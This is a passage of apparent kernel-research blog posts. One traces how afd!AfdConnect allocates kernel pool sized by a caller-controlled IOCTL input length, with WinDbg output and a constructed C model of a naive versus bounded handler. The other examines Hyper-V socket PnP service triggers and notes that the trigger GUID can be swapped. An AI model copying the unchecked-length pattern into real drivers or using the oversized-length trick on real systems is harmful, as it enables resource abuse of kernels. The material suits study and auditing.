<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PVOID ExAllocatePoolWithTagPriority(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ POOL_TYPE PoolType,- NonPagedPoolNx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ SIZE_T NumberOfBytes,- (InputBufferLength-0xC)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG Tag,- AfdR</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ EX_POOL_PRIORITY Priority - LowPoolPriority</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If we change the InputBufferLength parameter of ntdll!NtDeviceIoControlFile from 0x30 to 0x4FFFFFFF before execution, we get:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> k</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 ffff8b80`7489c678 fffff805`53c46d9f nt!ExAllocatePoolWithTagPriority</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 ffff8b80`7489c680 fffff803`57293180 afd!AfdConnect+0x36f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 ffff8b80`7489c820 fffff803`57292064 nt!IopSynchronousServiceTail+0x1a0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ffff8b80`7489c8e0 fffff803`572919e6 nt!IopXxxControlFile+0x674</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 ffff8b80`7489ca20 fffff803`56fd5493 nt!NtDeviceIoControlFile+0x56</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ffff8b80`7489ca90 00000000`52dd222c nt!KiSystemServiceCopyEnd+0x13</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> r</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000200</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx=00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">4ffffff3</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – buffer size</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=0000000052646641 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r9=0000000000000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !poolused 2 AfdR</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Sorting by NonPaged Pool Consumed</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> NonPaged Paged</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Tag Allocs Used Allocs Used</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> AfdR 6 1 342 178 160 0 0</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Afd remote address buffer , Binary: afd.sys</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">TOTAL 6 1 342 178 160 0 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then the user buffer (the InputBuffer parameter) is copied into the allocated kernel pool by memmove. If the user buffer is not actually allocated, a page fault exception may be raised during the copy, especially when the buffer size was set to hundreds of megabytes (the exception is handled by afd!AfdExceptionFilter). This kernel pool is freed by nt!ExFreePoolWithTag at the end of afd!AfdConnect.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This was tested with Hyper-V Sockets, but it will probably work with standard TCP/IP sockets too.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I believe that the LowPoolPriority parameter of nt!ExAllocatePoolWithTagPriority will not allow the operating system to hang because of the limited kernel pool size.</span></div>
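<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As an added illustration of the pattern traced above (this is a constructed user-mode model, not afd.sys code and not the blog author's), the C program below shows an IOCTL-style handler that allocates pool of the caller-supplied length and copies the user buffer into it, next to a bounded variant that rejects oversized lengths before touching the pool at all. The simulated pool budget, the MAX_REMOTE_ADDR limit, the 36-byte sample buffer and every function name here are assumptions of the model.</span></div>

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed user-mode model of the AfdConnect allocation pattern; not afd.sys
 * code. The pool budget and the address limit are assumptions of this model. */
#define SIM_POOL_BUDGET (256u * 1024u * 1024u)  /* 256 MiB of simulated nonpaged pool */
#define MAX_REMOTE_ADDR 128u                    /* largest address the handler should accept */

typedef enum {
    CONNECT_OK = 0,
    CONNECT_INVALID_LENGTH,   /* rejected before any allocation */
    CONNECT_NO_RESOURCES,     /* low-priority allocation refused */
    CONNECT_FAULT             /* page fault while copying the user buffer */
} connect_status;

/* A user buffer as the kernel sees it: the length the caller claims (the IOCTL
 * input length) may be far larger than what is actually mapped. */
typedef struct {
    const uint8_t *data;
    size_t mapped;            /* bytes actually readable */
} user_buffer;

static size_t g_pool_used;        /* bytes currently held in the model pool */
static size_t g_largest_request;  /* largest size ever requested from it */

size_t pool_bytes_in_use(void)    { return g_pool_used; }
size_t pool_largest_request(void) { return g_largest_request; }

/* Models ExAllocatePoolWithTagPriority with LowPoolPriority: a request that
 * would exhaust the budget fails rather than starving the rest of the system. */
static void *sim_pool_alloc(size_t n)
{
    if (n > g_largest_request) g_largest_request = n;
    if (n == 0 || n > SIM_POOL_BUDGET - g_pool_used) return NULL;
    void *p = malloc(n);
    if (p) g_pool_used += n;
    return p;
}

static void sim_pool_free(void *p, size_t n)
{
    free(p);
    g_pool_used -= n;
}

/* Models memmove from the user buffer under __try/__except: touching unmapped
 * pages raises the fault that afd!AfdExceptionFilter would catch. */
static bool sim_copy_from_user(void *dst, const user_buffer *src, size_t n)
{
    if (n > src->mapped) return false;   /* page fault */
    memmove(dst, src->data, n);
    return true;
}

/* Pattern as observed in the debugger: the caller-supplied length drives the pool size. */
connect_status afd_connect_naive(const user_buffer *in, size_t claimed_len)
{
    uint8_t *copy = sim_pool_alloc(claimed_len);
    if (!copy) return CONNECT_NO_RESOURCES;
    bool ok = sim_copy_from_user(copy, in, claimed_len);
    sim_pool_free(copy, claimed_len);    /* freed at the end of the handler */
    return ok ? CONNECT_OK : CONNECT_FAULT;
}

/* Hardened pattern (this model's illustration, not afd's logic): bound the
 * length by the largest legitimate address before any allocation happens. */
connect_status afd_connect_bounded(const user_buffer *in, size_t claimed_len)
{
    if (claimed_len == 0 || claimed_len > MAX_REMOTE_ADDR) return CONNECT_INVALID_LENGTH;
    return afd_connect_naive(in, claimed_len);
}

/* Constructed sample input: a zero-filled 36-byte buffer (assumed address size). */
const user_buffer *sample_user_buffer(void)
{
    static const uint8_t addr[36];
    static const user_buffer ub = { addr, sizeof addr };
    return &ub;
}

int main(void)
{
    const user_buffer *ub = sample_user_buffer();
    printf("naive, honest length:  %d\n", afd_connect_naive(ub, ub->mapped));
    printf("naive, 1 MiB claimed:  %d\n", afd_connect_naive(ub, 1u << 20));
    printf("naive, 0x4ffffff3:     %d\n", afd_connect_naive(ub, 0x4ffffff3u));
    printf("bounded, 0x4ffffff3:   %d\n", afd_connect_bounded(ub, 0x4ffffff3u));
    printf("largest pool request:  %zu bytes\n", pool_largest_request());
    return 0;
}
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The naive handler with the 0x4ffffff3 length seen in rdx above records a 1.25 GB pool request and survives only because the low-priority allocation fails; with a 1 MiB claimed length over a 36-byte mapping it allocates, faults during the copy and frees. The bounded handler never reaches the pool for either length, which is the property to look for when auditing an IOCTL path.</span></div>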
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Tested on afd version:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>lmvm afd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Image path: \SystemRoot\system32\drivers\afd.sys</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Image name: afd.sys</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Timestamp: Sat Oct 15 06:53:45 2016 (5801A849)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<br /></div>
</div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-63890081598707042672017-06-17T14:02:00.001-07:002017-06-17T14:11:47.867-07:00Hyper-V Sockets and PnP<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" id="docs-internal-guid-c5a49f74-b7d9-66ca-a81d-5d88beaa5614" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><br /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">How does a Powershell Direct session work internally? When an application that uses a Hyper-V socket makes a CONNECT call, the root partition sends a message to the guest OS using winhvr!WinHvPostMessage:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !dc @rdx – before vmcall (part of message body)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#227b36000 00000001 00000000 00000001 000000c4 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#227b36010 00000001 00000000 </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">999e53d4 4c3e3d5c</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> .........S..\=>L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#227b36020 </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">d0be7987 e156c06e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If we look at the parameters of the vmicvmsession service, we find that it has a start trigger. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="91" src="https://lh5.googleusercontent.com/HrHnqjecjr34enDPKvNEMsq_afM6VqVM0Qkj-SHh06hfpeV1wvVgWKKVImLt9w2b6cNomvjunh2wBtcfHxcpfPfjQv0cR126RX68TGw0udkyF48Bj8xggXb5xQvg1Oz6omHQuvYTfy9a-6bhUw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="566" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After the message is delivered to the guest OS, the vmbus driver registers a new device interface: </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 nt!IoRegisterDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 Wdf01000!Mx::MxRegisterDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Wdf01000!FxDeviceInterface::Register</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 Wdf01000!FxDeviceInterface::Register</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 Wdf01000!imp_WdfDeviceCreateDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbus!RootStartDeviceInterfaceByContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 hvsocket!VmbusTlXPartProcessNewConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">07 vmbus!RootNotifyDeviceInterfaceArrival</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 Wdf01000!FxWorkItem::WorkItemHandler</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 Wdf01000!FxWorkItem::WorkItemThunk</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0d nt!KiStartSystemThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And the PnP notification mechanism fires:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 nt!PnpNotifyDeviceClassChange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!PnpDeviceEventWorker</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The service trigger fires and the service starts. After that, icsvc.dll configures the socket and begins communicating with the host OS.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Interestingly, that GUID can be changed to the interface GUID of another device. The services that have a trigger on the DEVICE INTERFACE ARRIVAL event can be listed:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">All Hyper-V guest services</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Bluetooth Support Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Camera Frame Server</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Human Interface Device Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
